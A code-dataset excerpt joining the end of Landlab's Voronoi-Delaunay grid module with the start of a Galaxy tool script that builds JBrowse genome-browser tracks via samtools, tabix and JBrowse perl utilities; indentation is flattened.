>>> from landlab import VoronoiDelaunayGrid as vdg
>>> import numpy as np
>>> from landlab.grid import BAD_INDEX_VALUE
>>> ns = np.array([1, 0, 0, 1, 0]) # 3 interior, 2 boundary nodes
>>> [node_cell, cell_node] = vdg._node_to_cell_connectivity(ns, 3)
>>> node_cell[1:3]
array([0, 1])
>>> node_cell[0] == BAD_INDEX_VALUE
True
>>> cell_node
array([1, 2, 4])
"""
assert ncells == np.count_nonzero(node_status == CORE_NODE), \
'ncells must equal number of CORE_NODE values in node_status'
cell = 0
node_cell = np.ones(len(node_status), dtype=int) * BAD_INDEX_VALUE
cell_node = np.zeros(ncells, dtype=int)
for node in range(len(node_cell)):
if node_status[node] == CORE_NODE:
node_cell[node] = cell
cell_node[cell] = node
cell += 1
return node_cell, cell_node
@staticmethod
def _create_links_from_triangulation(tri):
"""Create links from a Delaunay triangulation.
From a Delaunay Triangulation of a set of points, contained in a
scipy.spatial.Delaunay object "tri", creates and returns:
* a numpy array containing the ID of the "from" node for each link
* a numpy array containing the ID of the "to" node for each link
* the number of links in the triangulation
Examples
--------
>>> from scipy.spatial import Delaunay
>>> import numpy as np
>>> from landlab.grid import VoronoiDelaunayGrid as vdg
>>> pts = np.array([[ 0., 0.], [ 1., 0.], [ 1., 0.87],
... [-0.5, 0.87], [ 0.5, 0.87], [ 0., 1.73],
... [ 1., 1.73]])
>>> dt = Delaunay(pts)
>>> [myfrom,myto,nl] = vdg._create_links_from_triangulation(dt)
>>> print myfrom, myto, nl # doctest: +SKIP
[5 3 4 6 4 3 0 4 1 1 2 6] [3 4 5 5 6 0 4 1 0 2 4 2] 12
"""
# Calculate how many links there will be and create the arrays.
#
# The number of links equals 3 times the number of triangles minus
# half the number of shared links. Finding out the number of shared
# links is easy: for every shared link, there is an entry in the
# tri.neighbors array that is > -1 (indicating that the triangle has a
# neighbor opposite a given vertex; in other words, two triangles are
# sharing an edge).
num_shared_links = np.count_nonzero(tri.neighbors > -1)
num_links = 3 * tri.nsimplex - num_shared_links // 2
link_fromnode = np.zeros(num_links, dtype=int)
link_tonode = np.zeros(num_links, dtype=int)
# Sweep through the list of triangles, assigning "from" and "to" nodes
# to the list of links.
#
# The basic algorithm works as follows. For each triangle, we will add
# its 3 edges as links. However, we have to make sure that each shared
# edge is added only once. To do this, we keep track of whether or not
# each triangle has been processed yet using a boolean array called
# "tridone". When we look at a given triangle, we check each vertex in
# turn. If there is no neighboring triangle opposite that vertex, then
# we need to add the corresponding edge. If there is a neighboring
# triangle but we haven't processed it yet, we also need to add the
# edge. If neither condition is true, then this edge has already been
# added, so we skip it.
link_id = 0
tridone = np.zeros(tri.nsimplex, dtype=bool)
for t in range(tri.nsimplex): # loop over triangles
for i in range(0, 3): # loop over vertices & neighbors
if tri.neighbors[t, i] == -1 or not tridone[
tri.neighbors[t, i]]:
link_fromnode[link_id] = tri.simplices[
t, np.mod(i + 1, 3)]
link_tonode[link_id] = tri.simplices[
t, np.mod(i + 2, 3)]
link_id += 1
tridone[t] = True
# save the results
# self.node_at_link_tail = link_fromnode
# self.node_at_link_head = link_tonode
# Return the results
return link_fromnode, link_tonode, num_links
@staticmethod
def _is_valid_voronoi_ridge(vor, n):
SUSPICIOUSLY_BIG = 40000000.0
return (vor.ridge_vertices[n][0] != -1 and
vor.ridge_vertices[n][1] != -1 and
np.amax(np.abs(vor.vertices[
vor.ridge_vertices[n]])) < SUSPICIOUSLY_BIG)
@staticmethod
def _create_links_and_faces_from_voronoi_diagram(vor):
"""
From a Voronoi diagram object created by scipy.spatial.Voronoi(),
builds and returns:
1. Arrays of link tail and head nodes
2. Array of link IDs for each active link
3. Array containing with of each face
Parameters
----------
vor : scipy.spatial.Voronoi
Voronoi object initialized with the grid nodes.
Returns
-------
out : tuple of ndarrays
- link_fromnode = "from" node for each link (len=num_links)
- link_tonode = "to" node for each link (len=num_links)
- active_links = link ID for each active link
(len=num_active_links)
- face_width = width of each face (len=num_active_links
Examples
--------
>>> import numpy as np
>>> from landlab.grid import VoronoiDelaunayGrid as vdg
>>> pts = np.array([[0., 0.], [1., 0.], [-0.5, 0.87], [0.5, 0.87],
... [1.5, 0.87], [0., 1.73], [1., 1.73]])
>>> from scipy.spatial import Voronoi
>>> vor = Voronoi(pts)
>>> [tn,hn,al,fw] = vdg._create_links_and_faces_from_voronoi_diagram(
... vor)
>>> tn
array([0, 0, 0, 1, 1, 2, 3, 2, 3, 6, 6, 6])
>>> hn
array([1, 2, 3, 3, 4, 3, 4, 5, 5, 3, 4, 5])
>>> al
array([2, 3, 5, 6, 8, 9])
>>> fw
array([ 0.57669199, 0.57669199, 0.575973 , 0.575973 , 0.57836419,
0.57836419])
"""
# Each Voronoi "ridge" corresponds to a link. The Voronoi object has an
# attribute ridge_points that contains the IDs of the nodes on either
# side (including ridges that have one of their endpoints undefined).
# So, we set the number of links equal to the number of ridges.
num_links = len(vor.ridge_points)
# Create the arrays for link from and to nodes
link_fromnode = -np.ones(num_links, dtype=int)
link_tonode = -np.ones(num_links, dtype=int)
# Ridges along the perimeter of the grid will have one of their
# endpoints undefined. The endpoints of each ridge are contained in
# vor.ridge_vertices, and an undefined vertex is flagged with -1.
# Ridges with both vertices defined correspond to faces and active
# links, while ridges with an undefined vertex correspond to inactive
# links. So, to find the number of active links, we subtract from the
# total number of links the number of occurrences of an undefined
# vertex.
num_active_links = num_links \
- np.count_nonzero(np.array(vor.ridge_vertices) == -1)
# Create arrays for active links and width of faces (which are Voronoi
# ridges).
active_links = -np.ones(num_active_links, dtype=int)
face_width = -np.ones(num_active_links)
# Find the order to sort by link midpoints
link_midpoints = np.zeros((num_links, 2))
for i in range(num_links):
link_midpoints[i][:] = (vor.points[vor.ridge_points[i, 0]] +
vor.points[vor.ridge_points[i, 1]])/2.
ind = argsort_points_by_x_then_y(link_midpoints)
# Loop through the list of ridges. For each ridge, there is a link, and
# its "from" and "to" nodes are the associated "points". In addition,
# if the ridge endpoints are defined, we have a face and an active
# link, so we add them to our arrays as well.
j = 0
for i in range(num_links):
link_fromnode[i] = vor.ridge_points[ind[i], 0]
link_tonode[i] = vor.ridge_points[ind[i], 1]
face_corner1 = vor.ridge_vertices[ind[i]][0]
face_corner2 = vor.ridge_vertices[ind[i]][1]
# means it's a valid face
if VoronoiDelaunayGrid._is_valid_voronoi_ridge(vor, ind[i]):
dx = vor.vertices[face_corner2, 0] - \
vor.vertices[face_corner1, 0]
dy = vor.vertices[face_corner2, 1] - \
vor.vertices[face_corner1, 1]
face_width[j] = np.sqrt(dx * dx + dy * dy)
active_links[j] = i
j += 1
return link_fromnode, link_tonode, active_links, face_width
def _reorient_links_upper_right(self):
"""Reorient links to all point within the upper-right semi-circle.
Notes
-----
"Upper right semi-circle" means that the angle of the link with respect
to the vertical (measured clockwise) falls between -45 and +135. More
precisely, if :math:`\theta' is the angle,
:math:`-45 \ge \theta < 135`.
For example, the link could point up and left as much as -45, but not
-46. It could point down and right as much as 134.9999, but not 135. It
will never point down and left, or up-but-mostly-left, or
right-but-mostly-down.
Examples
--------
>>> from landlab.grid import HexModelGrid
>>> hg = HexModelGrid(3, 2, 1., reorient_links=True)
>>> hg.node_at_link_tail
array([0, 0, 0, 1, 1, 2, 3, 2, 3, 3, 4, 5])
>>> hg.node_at_link_head
array([1, 2, 3, 3, 4, 3, 4, 5, 5, 6, 6, 6])
"""
# Calculate the horizontal (dx) and vertical (dy) link offsets
link_dx = self.node_x[self.node_at_link_head] - \
self.node_x[self.node_at_link_tail]
link_dy = self.node_y[self.node_at_link_head] - \
self.node_y[self.node_at_link_tail]
# Calculate the angle, clockwise, with respect to vertical, then rotate
# by 45 degrees counter-clockwise (by adding pi/4)
link_angle = np.arctan2(link_dx, link_dy) + np.pi / 4
# The range of values should be -180 to +180 degrees (but in radians).
# It won't be after the above operation, because angles that were
# > 135 degrees will now have values > 180. To correct this, we
# subtract 360 (i.e., 2 pi radians) from those that are > 180 (i.e.,
# > pi radians).
link_angle -= 2 * np.pi * (link_angle >= np.pi)
# Find locations where the angle is negative; these are the ones we
# want to flip
(flip_locs, ) = np.where(link_angle < 0.)
# If there are any flip locations, proceed to switch their fromnodes
# and tonodes; otherwise, we're done
if len(flip_locs) > 0:
# Temporarily story the fromnode for these
fromnode_temp = self.node_at_link_tail[flip_locs]
# The fromnodes now become the tonodes, and vice versa
self._node_at_link_tail[
flip_locs] = self.node_at_link_head[flip_locs]
self._node_at_link_head[flip_locs] = fromnode_temp
def _create_patches_from_delaunay_diagram(self, pts, vor):
"""
Uses a delaunay diagram drawn from the provided points to
generate an array of patches and patch-node-link connectivity.
Returns ...
DEJH, 10/3/14, modified May 16.
"""
from scipy.spatial import Delaunay
from landlab.core.utils import anticlockwise_argsort_points_multiline
from .cfuncs import find_rows_containing_ID, \
create_patches_at_element, create_links_at_patch
tri = Delaunay(pts)
assert np.array_equal(tri.points, vor.points)
nodata = -1
self._nodes_at_patch = as_id_array(tri.simplices)
# self._nodes_at_patch = np.empty_like(_nodes_at_patch)
self._number_of_patches = tri.simplices.shape[0]
# get the patches in order:
patches_xy = np.empty((self._number_of_patches, 2), dtype=float)
patches_xy[:, 0] = np.mean(self.node_x[self._nodes_at_patch],
axis=1)
patches_xy[:, 1] = np.mean(self.node_y[self._nodes_at_patch],
axis=1)
orderforsort = argsort_points_by_x_then_y(patches_xy)
self._nodes_at_patch = self._nodes_at_patch[orderforsort, :]
patches_xy = patches_xy[orderforsort, :]
# get the nodes around the patch in order:
nodes_xy = np.empty((3, 2), dtype=float)
# perform a CCW sort without a line-by-line loop:
patch_nodes_x = self.node_x[self._nodes_at_patch]
patch_nodes_y = self.node_y[self._nodes_at_patch]
anticlockwise_argsort_points_multiline(patch_nodes_x, patch_nodes_y,
out=self._nodes_at_patch)
# need to build a squared off, masked array of the patches_at_node
# the max number of patches for a node in the grid is the max sides of
# the side-iest voronoi region.
max_dimension = len(max(vor.regions, key=len))
self._patches_at_node = np.full(
(self.number_of_nodes, max_dimension), nodata, dtype=int)
self._nodes_at_patch = as_id_array(self._nodes_at_patch)
self._patches_at_node = as_id_array(self._patches_at_node)
create_patches_at_element(self._nodes_at_patch,
self.number_of_nodes,
self._patches_at_node)
# build the patch-link connectivity:
self._links_at_patch = np.empty((self._number_of_patches, 3),
dtype=int)
create_links_at_patch(self._nodes_at_patch, self._links_at_node,
self._number_of_patches, self._links_at_patch)
patch_links_x = self.x_of_link[self._links_at_patch]
patch_links_y = self.y_of_link[self._links_at_patch]
anticlockwise_argsort_points_multiline(patch_links_x, patch_links_y,
out=self._links_at_patch)
self._patches_at_link = np.empty((self.number_of_links, 2),
dtype=int)
self._patches_at_link.fill(-1)
create_patches_at_element(self._links_at_patch, self.number_of_links,
self._patches_at_link)
# a sort of the links will be performed here once we have corners
self._patches_created = True
def _create_neighbors(self):
"""Create the _neighbors_at_node property.
"""
self._neighbors_at_node = self.links_at_node.copy()
nodes_at_link = np.empty((self.number_of_links, 2))
nodes_at_link[:, 0] = self.node_at_link_tail
nodes_at_link[:, 1] = self.node_at_link_head
both_nodes = nodes_at_link[self.links_at_node]
nodes = np.arange(self.number_of_nodes, dtype=int)
# ^we have to do this, as for a hex it's possible that mg.nodes is
# returned not just in ID order.
for i in range(both_nodes.shape[1]):
centernottail = np.not_equal(both_nodes[:, i, 0], nodes)
centernothead = np.not_equal(both_nodes[:, i, 1], nodes)
self._neighbors_at_node[centernottail, i] = both_nodes[
centernottail, i, 0]
self._neighbors_at_node[centernothead, i] = both_nodes[
centernothead, i, 1]
# restamp the missing links:
self._neighbors_at_node[
self.links_at_node == BAD_INDEX_VALUE] = BAD_INDEX_VALUE
def save(self, path, clobber=False):
"""Save a grid and fields.
This method uses cPickle to save a Voronoi grid as a cPickle file.
At the time of coding, this is the only convenient output format
for Voronoi grids, but support for netCDF is likely coming.
All fields will be saved, along with the grid.
The recommended suffix for the save file is '.grid'. This will
be added to your save if you don't include it.
This method is equivalent to
:py:func:`~landlab.io.native_landlab.save_grid`, and
:py:func:`~landlab.io.native_landlab.load_grid` can be used to
load these files.
Caution: Pickling can be slow, and can produce very large files.
Caution 2: Future updates to Landlab could potentially render old
saves unloadable.
Parameters
----------
path : str
Path to output file.
clobber : bool (defaults to false)
Set to true to allow overwriting
Examples
--------
>>> from landlab import VoronoiDelaunayGrid
>>> import numpy as np
>>> import os
>>> x = np.random.rand(20)
>>> y = np.random.rand(20)
>>> vmg = VoronoiDelaunayGrid(x,y)
>>> vmg.save('./mytestsave.grid')
>>> os.remove('mytestsave.grid') #to remove traces of this test
LLCATS: GINF
"""
import os
from six.moves import cPickle
if os.path.exists(path) and not clobber:
raise ValueError('file exists')
(base, ext) = os.path.splitext(path)
if ext != '.grid':
ext = ext + '.grid'
path = base + ext
with open(path, 'wb') as fp:
cPickle.dump(self, fp)
if __name__ == '__main__':
import doctest
doctest.testmod()
|
laijingtao/landlab
|
landlab/grid/voronoi.py
|
Python
|
mit
| 54,129
|
[
"NetCDF"
] |
959dc07e7ffa88eee7f5eb581b19e8c8c688ad133e5aa9ea21b7a278b96ae41f
|
#!/usr/bin/env python
import argparse
import binascii
import copy
import datetime
import hashlib
import json
import logging
import os
import shutil
import struct
import subprocess
import tempfile
import xml.etree.ElementTree as ET
from collections import defaultdict
from Bio.Data import CodonTable
logging.basicConfig(level=logging.INFO)
log = logging.getLogger('jbrowse')
TODAY = datetime.datetime.now().strftime("%Y-%m-%d")
GALAXY_INFRASTRUCTURE_URL = None
class ColorScaling(object):
COLOR_FUNCTION_TEMPLATE = """
function(feature, variableName, glyphObject, track) {{
var score = {score};
{opacity}
return 'rgba({red}, {green}, {blue}, ' + opacity + ')';
}}
"""
COLOR_FUNCTION_TEMPLATE_QUAL = r"""
function(feature, variableName, glyphObject, track) {{
var search_up = function self(sf, attr){{
if(sf.get(attr) !== undefined){{
return sf.get(attr);
}}
if(sf.parent() === undefined) {{
return;
}}else{{
return self(sf.parent(), attr);
}}
}};
var search_down = function self(sf, attr){{
if(sf.get(attr) !== undefined){{
return sf.get(attr);
}}
if(sf.children() === undefined) {{
return;
}}else{{
var kids = sf.children();
for(var child_idx in kids){{
var x = self(kids[child_idx], attr);
if(x !== undefined){{
return x;
}}
}}
return;
}}
}};
var color = ({user_spec_color} || search_up(feature, 'color') || search_down(feature, 'color') || {auto_gen_color});
var score = (search_up(feature, 'score') || search_down(feature, 'score'));
{opacity}
if(score === undefined){{ opacity = 1; }}
var result = /^#?([a-f\d]{{2}})([a-f\d]{{2}})([a-f\d]{{2}})$/i.exec(color);
var red = parseInt(result[1], 16);
var green = parseInt(result[2], 16);
var blue = parseInt(result[3], 16);
if(isNaN(opacity) || opacity < 0){{ opacity = 0; }}
return 'rgba(' + red + ',' + green + ',' + blue + ',' + opacity + ')';
}}
"""
OPACITY_MATH = {
'linear': """
var opacity = (score - ({min})) / (({max}) - ({min}));
""",
'logarithmic': """
var opacity = Math.log10(score - ({min})) / Math.log10(({max}) - ({min}));
""",
'blast': """
var opacity = 0;
if(score == 0.0) {{
opacity = 1;
}} else {{
opacity = (20 - Math.log10(score)) / 180;
}}
"""
}
BREWER_COLOUR_IDX = 0
BREWER_COLOUR_SCHEMES = [
(166, 206, 227),
(31, 120, 180),
(178, 223, 138),
(51, 160, 44),
(251, 154, 153),
(227, 26, 28),
(253, 191, 111),
(255, 127, 0),
(202, 178, 214),
(106, 61, 154),
(255, 255, 153),
(177, 89, 40),
(228, 26, 28),
(55, 126, 184),
(77, 175, 74),
(152, 78, 163),
(255, 127, 0),
]
BREWER_DIVERGING_PALLETES = {
'BrBg': ("#543005", "#003c30"),
'PiYg': ("#8e0152", "#276419"),
'PRGn': ("#40004b", "#00441b"),
'PuOr': ("#7f3b08", "#2d004b"),
'RdBu': ("#67001f", "#053061"),
'RdGy': ("#67001f", "#1a1a1a"),
'RdYlBu': ("#a50026", "#313695"),
'RdYlGn': ("#a50026", "#006837"),
'Spectral': ("#9e0142", "#5e4fa2"),
}
def __init__(self):
self.brewer_colour_idx = 0
def rgb_from_hex(self, hexstr):
# http://stackoverflow.com/questions/4296249/how-do-i-convert-a-hex-triplet-to-an-rgb-tuple-and-back
return struct.unpack('BBB', binascii.unhexlify(hexstr))
def min_max_gff(self, gff_file):
min_val = None
max_val = None
with open(gff_file, 'r') as handle:
for line in handle:
try:
value = float(line.split('\t')[5])
min_val = min(value, (min_val or value))
max_val = max(value, (max_val or value))
if value < min_val:
min_val = value
if value > max_val:
max_val = value
except Exception:
pass
return min_val, max_val
def hex_from_rgb(self, r, g, b):
return '#%02x%02x%02x' % (r, g, b)
def _get_colours(self):
r, g, b = self.BREWER_COLOUR_SCHEMES[self.brewer_colour_idx % len(self.BREWER_COLOUR_SCHEMES)]
self.brewer_colour_idx += 1
return r, g, b
def parse_menus(self, track):
trackConfig = {'menuTemplate': [{}, {}, {}, {}]}
if 'menu' in track['menus']:
menu_list = [track['menus']['menu']]
if isinstance(track['menus']['menu'], list):
menu_list = track['menus']['menu']
for m in menu_list:
tpl = {
'action': m['action'],
'label': m.get('label', '{name}'),
'iconClass': m.get('iconClass', 'dijitIconBookmark'),
}
if 'url' in m:
tpl['url'] = m['url']
if 'content' in m:
tpl['content'] = m['content']
if 'title' in m:
tpl['title'] = m['title']
trackConfig['menuTemplate'].append(tpl)
return trackConfig
def parse_colours(self, track, trackFormat, gff3=None):
# Wiggle tracks have a bicolor pallete
trackConfig = {'style': {}}
if trackFormat == 'wiggle':
trackConfig['style']['pos_color'] = track['wiggle']['color_pos']
trackConfig['style']['neg_color'] = track['wiggle']['color_neg']
if trackConfig['style']['pos_color'] == '__auto__':
trackConfig['style']['neg_color'] = self.hex_from_rgb(*self._get_colours())
trackConfig['style']['pos_color'] = self.hex_from_rgb(*self._get_colours())
# Wiggle tracks can change colour at a specified place
bc_pivot = track['wiggle']['bicolor_pivot']
if bc_pivot not in ('mean', 'zero'):
# The values are either one of those two strings
# or a number
bc_pivot = float(bc_pivot)
trackConfig['bicolor_pivot'] = bc_pivot
elif 'scaling' in track:
if track['scaling']['method'] == 'ignore':
if track['scaling']['scheme']['color'] != '__auto__':
trackConfig['style']['color'] = track['scaling']['scheme']['color']
else:
trackConfig['style']['color'] = self.hex_from_rgb(*self._get_colours())
else:
# Scored method
algo = track['scaling']['algo']
# linear, logarithmic, blast
scales = track['scaling']['scales']
# type __auto__, manual (min, max)
scheme = track['scaling']['scheme']
# scheme -> (type (opacity), color)
# ==================================
# GENE CALLS OR BLAST
# ==================================
if trackFormat == 'blast':
red, green, blue = self._get_colours()
color_function = self.COLOR_FUNCTION_TEMPLATE.format(**{
'score': "feature._parent.get('score')",
'opacity': self.OPACITY_MATH['blast'],
'red': red,
'green': green,
'blue': blue,
})
trackConfig['style']['color'] = color_function.replace('\n', '')
elif trackFormat == 'gene_calls':
# Default values, based on GFF3 spec
min_val = 0
max_val = 1000
# Get min/max and build a scoring function since JBrowse doesn't
if scales['type'] == 'automatic' or scales['type'] == '__auto__':
min_val, max_val = self.min_max_gff(gff3)
else:
min_val = scales.get('min', 0)
max_val = scales.get('max', 1000)
if scheme['color'] == '__auto__':
user_color = 'undefined'
auto_color = "'%s'" % self.hex_from_rgb(*self._get_colours())
elif scheme['color'].startswith('#'):
user_color = "'%s'" % self.hex_from_rgb(*self.rgb_from_hex(scheme['color'][1:]))
auto_color = 'undefined'
else:
user_color = 'undefined'
auto_color = "'%s'" % self.hex_from_rgb(*self._get_colours())
color_function = self.COLOR_FUNCTION_TEMPLATE_QUAL.format(**{
'opacity': self.OPACITY_MATH[algo].format(**{'max': max_val, 'min': min_val}),
'user_spec_color': user_color,
'auto_gen_color': auto_color,
})
trackConfig['style']['color'] = color_function.replace('\n', '')
return trackConfig
def etree_to_dict(t):
if t is None:
return {}
d = {t.tag: {} if t.attrib else None}
children = list(t)
if children:
dd = defaultdict(list)
for dc in map(etree_to_dict, children):
for k, v in dc.items():
dd[k].append(v)
d = {t.tag: {k: v[0] if len(v) == 1 else v for k, v in dd.items()}}
if t.attrib:
d[t.tag].update(('@' + k, v) for k, v in t.attrib.items())
if t.text:
text = t.text.strip()
if children or t.attrib:
if text:
d[t.tag]['#text'] = text
else:
d[t.tag] = text
return d
# score comes from feature._parent.get('score') or feature.get('score')
INSTALLED_TO = os.path.dirname(os.path.realpath(__file__))
def metadata_from_node(node):
metadata = {}
try:
if len(node.findall('dataset')) != 1:
# exit early
return metadata
except Exception:
return {}
for (key, value) in node.findall('dataset')[0].attrib.items():
metadata['dataset_%s' % key] = value
for (key, value) in node.findall('history')[0].attrib.items():
metadata['history_%s' % key] = value
for (key, value) in node.findall('metadata')[0].attrib.items():
metadata['metadata_%s' % key] = value
for (key, value) in node.findall('tool')[0].attrib.items():
metadata['tool_%s' % key] = value
# Additional Mappings applied:
metadata['dataset_edam_format'] = '<a target="_blank" href="http://edamontology.org/{0}">{1}</a>'.format(metadata['dataset_edam_format'], metadata['dataset_file_ext'])
metadata['history_user_email'] = '<a href="mailto:{0}">{0}</a>'.format(metadata['history_user_email'])
metadata['history_display_name'] = '<a target="_blank" href="{galaxy}/history/view/{encoded_hist_id}">{hist_name}</a>'.format(
galaxy=GALAXY_INFRASTRUCTURE_URL,
encoded_hist_id=metadata['history_id'],
hist_name=metadata['history_display_name']
)
metadata['tool_tool'] = '<a target="_blank" href="{galaxy}/datasets/{encoded_id}/show_params">{tool_id}</a>'.format(
galaxy=GALAXY_INFRASTRUCTURE_URL,
encoded_id=metadata['dataset_id'],
tool_id=metadata['tool_tool_id'],
tool_version=metadata['tool_tool_version'],
)
return metadata
class JbrowseConnector(object):
def __init__(self, jbrowse, outdir, genomes, standalone=False, gencode=1):
self.TN_TABLE = {
'gff3': '--gff',
'gff': '--gff',
'bed': '--bed',
'genbank': '--gbk',
}
self.cs = ColorScaling()
self.jbrowse = jbrowse
self.outdir = outdir
self.genome_paths = genomes
self.standalone = standalone
self.gencode = gencode
self.tracksToIndex = []
if standalone:
self.clone_jbrowse(self.jbrowse, self.outdir)
else:
try:
os.makedirs(self.outdir)
except OSError:
# Ignore if the folder exists
pass
try:
os.makedirs(os.path.join(self.outdir, 'data', 'raw'))
except OSError:
# Ignore if the folder exists
pass
self.process_genomes()
self.update_gencode()
def update_gencode(self):
table = CodonTable.unambiguous_dna_by_id[int(self.gencode)]
trackList = os.path.join(self.outdir, 'data', 'trackList.json')
with open(trackList, 'r') as handle:
trackListData = json.load(handle)
trackListData['tracks'][0].update({
'codonStarts': table.start_codons,
'codonStops': table.stop_codons,
'codonTable': table.forward_table,
})
with open(trackList, 'w') as handle:
json.dump(trackListData, handle, indent=2)
def subprocess_check_call(self, command):
log.debug('cd %s && %s', self.outdir, ' '.join(command))
subprocess.check_call(command, cwd=self.outdir)
def subprocess_popen(self, command):
log.debug('cd %s && %s', self.outdir, command)
p = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, err = p.communicate()
retcode = p.returncode
if retcode != 0:
log.error('cd %s && %s', self.outdir, command)
log.error(output)
log.error(err)
raise RuntimeError("Command failed with exit code %s" % (retcode))
def _jbrowse_bin(self, command):
return os.path.realpath(os.path.join(self.jbrowse, 'bin', command))
def process_genomes(self):
for genome_node in self.genome_paths:
# We only expect one input genome per run. This for loop is just
# easier to write than the alternative / catches any possible
# issues.
# Copy the file in workdir, prepare-refseqs.pl will copy it to jbrowse's data dir
local_genome = os.path.realpath('./genome.fasta')
shutil.copy(genome_node['path'], local_genome)
cmd = ['samtools', 'faidx', local_genome]
self.subprocess_check_call(cmd)
self.subprocess_check_call([
'perl', self._jbrowse_bin('prepare-refseqs.pl'),
'--trackConfig', json.dumps({'metadata': genome_node['meta']}),
'--indexed_fasta', os.path.realpath(local_genome)])
os.unlink(local_genome)
os.unlink(local_genome + '.fai')
def generate_names(self):
# Generate names
args = [
'perl', self._jbrowse_bin('generate-names.pl'),
'--hashBits', '16'
]
tracks = ','.join(self.tracksToIndex)
if tracks:
args += ['--tracks', tracks]
else:
# No tracks to index, index only the refseq
args += ['--tracks', 'DNA']
self.subprocess_check_call(args)
def _add_json(self, json_data):
cmd = [
'perl', self._jbrowse_bin('add-json.pl'),
json.dumps(json_data),
os.path.join('data', 'trackList.json')
]
self.subprocess_check_call(cmd)
def _add_track_json(self, json_data):
if len(json_data) == 0:
return
tmp = tempfile.NamedTemporaryFile(delete=False)
json.dump(json_data, tmp)
tmp.close()
cmd = ['perl', self._jbrowse_bin('add-track-json.pl'), tmp.name,
os.path.join('data', 'trackList.json')]
self.subprocess_check_call(cmd)
os.unlink(tmp.name)
def _blastxml_to_gff3(self, xml, min_gap=10):
gff3_unrebased = tempfile.NamedTemporaryFile(delete=False)
cmd = ['python', os.path.join(INSTALLED_TO, 'blastxml_to_gapped_gff3.py'),
'--trim', '--trim_end', '--include_seq', '--min_gap', str(min_gap), xml]
log.debug('cd %s && %s > %s', self.outdir, ' '.join(cmd), gff3_unrebased.name)
subprocess.check_call(cmd, cwd=self.outdir, stdout=gff3_unrebased)
gff3_unrebased.close()
return gff3_unrebased.name
def add_blastxml(self, data, trackData, blastOpts, **kwargs):
gff3 = self._blastxml_to_gff3(data, min_gap=blastOpts['min_gap'])
if 'parent' in blastOpts and blastOpts['parent'] != 'None':
gff3_rebased = tempfile.NamedTemporaryFile(delete=False)
cmd = ['python', os.path.join(INSTALLED_TO, 'gff3_rebase.py')]
if blastOpts.get('protein', 'false') == 'true':
cmd.append('--protein2dna')
cmd.extend([os.path.realpath(blastOpts['parent']), gff3])
log.debug('cd %s && %s > %s', self.outdir, ' '.join(cmd), gff3_rebased.name)
subprocess.check_call(cmd, cwd=self.outdir, stdout=gff3_rebased)
gff3_rebased.close()
# Replace original gff3 file
shutil.copy(gff3_rebased.name, gff3)
os.unlink(gff3_rebased.name)
dest = os.path.join(self.outdir, 'data', 'raw', trackData['label'] + '.gff')
self._sort_gff(gff3, dest)
url = os.path.join('raw', trackData['label'] + '.gff.gz')
trackData.update({
"urlTemplate": url,
"storeClass": "JBrowse/Store/SeqFeature/GFF3Tabix",
})
trackData['glyph'] = 'JBrowse/View/FeatureGlyph/Segments'
trackData['trackType'] = 'BlastView/View/Track/CanvasFeatures'
trackData['type'] = 'BlastView/View/Track/CanvasFeatures'
self._add_track_json(trackData)
os.unlink(gff3)
if blastOpts.get('index', 'false') == 'true':
self.tracksToIndex.append("%s" % trackData['label'])
def add_bigwig(self, data, trackData, wiggleOpts, **kwargs):
dest = os.path.join('data', 'raw', trackData['label'] + '.bw')
cmd = ['ln', '-s', data, dest]
self.subprocess_check_call(cmd)
url = os.path.join('raw', trackData['label'] + '.bw')
trackData.update({
"urlTemplate": url,
"storeClass": "JBrowse/Store/SeqFeature/BigWig",
"type": "JBrowse/View/Track/Wiggle/Density",
})
trackData['type'] = wiggleOpts['type']
trackData['variance_band'] = True if wiggleOpts['variance_band'] == 'true' else False
if 'min' in wiggleOpts and 'max' in wiggleOpts:
trackData['min_score'] = wiggleOpts['min']
trackData['max_score'] = wiggleOpts['max']
else:
trackData['autoscale'] = wiggleOpts.get('autoscale', 'local')
trackData['scale'] = wiggleOpts['scale']
self._add_track_json(trackData)
def add_bigwig_multiple(self, data, trackData, wiggleOpts, **kwargs):
urls = []
for idx, bw in enumerate(data):
dest = os.path.join('data', 'raw', trackData['label'] + '_' + str(idx) + '.bw')
cmd = ['ln', '-s', bw[1], dest]
self.subprocess_check_call(cmd)
urls.append({"url": os.path.join('raw', trackData['label'] + '_' + str(idx) + '.bw'), "name": str(idx + 1) + ' - ' + bw[0]})
trackData.update({
"urlTemplates": urls,
"showTooltips": "true",
"storeClass": "MultiBigWig/Store/SeqFeature/MultiBigWig",
"type": "MultiBigWig/View/Track/MultiWiggle/MultiDensity",
})
if 'XYPlot' in wiggleOpts['type']:
trackData['type'] = "MultiBigWig/View/Track/MultiWiggle/MultiXYPlot"
trackData['variance_band'] = True if wiggleOpts['variance_band'] == 'true' else False
if 'min' in wiggleOpts and 'max' in wiggleOpts:
trackData['min_score'] = wiggleOpts['min']
trackData['max_score'] = wiggleOpts['max']
else:
trackData['autoscale'] = wiggleOpts.get('autoscale', 'local')
trackData['scale'] = wiggleOpts['scale']
self._add_track_json(trackData)
def add_bam(self, data, trackData, bamOpts, bam_index=None, **kwargs):
dest = os.path.join('data', 'raw', trackData['label'] + '.bam')
cmd = ['ln', '-s', os.path.realpath(data), dest]
self.subprocess_check_call(cmd)
cmd = ['ln', '-s', os.path.realpath(bam_index), dest + '.bai']
self.subprocess_check_call(cmd)
url = os.path.join('raw', trackData['label'] + '.bam')
trackData.update({
"urlTemplate": url,
"type": "JBrowse/View/Track/Alignments2",
"storeClass": "JBrowse/Store/SeqFeature/BAM",
"chunkSizeLimit": bamOpts.get('chunkSizeLimit', '5000000')
})
# Apollo will only switch to the (prettier) 'bam-read' className if it's not set explicitly in the track config
# So remove the default 'feature' value for these bam tracks
if 'className' in trackData['style'] and trackData['style']['className'] == 'feature':
del trackData['style']['className']
self._add_track_json(trackData)
if bamOpts.get('auto_snp', 'false') == 'true':
trackData2 = copy.copy(trackData)
trackData2.update({
"type": "JBrowse/View/Track/SNPCoverage",
"key": trackData['key'] + " - SNPs/Coverage",
"label": trackData['label'] + "_autosnp",
"chunkSizeLimit": bamOpts.get('chunkSizeLimit', '5000000')
})
self._add_track_json(trackData2)
def add_vcf(self, data, trackData, vcfOpts={}, **kwargs):
dest = os.path.join('data', 'raw', trackData['label'] + '.vcf')
# ln?
cmd = ['ln', '-s', data, dest]
self.subprocess_check_call(cmd)
cmd = ['bgzip', dest]
self.subprocess_check_call(cmd)
cmd = ['tabix', '-p', 'vcf', dest + '.gz']
self.subprocess_check_call(cmd)
